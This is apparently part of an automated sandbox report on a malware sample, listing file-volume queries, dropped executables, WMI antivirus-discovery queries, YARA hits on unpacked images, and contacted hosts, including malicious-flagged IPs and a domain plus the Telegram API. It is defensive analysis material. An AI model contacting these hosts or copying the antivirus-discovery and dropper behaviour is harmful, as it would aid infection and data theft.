Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Queries volume information: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
157.254.223.19	unknown	United States	7768	TECHNICOLORUS	true
185.196.10.233	gjhfhgdg.insane.wang	Switzerland	42624	SIMPLECARRIERCH	true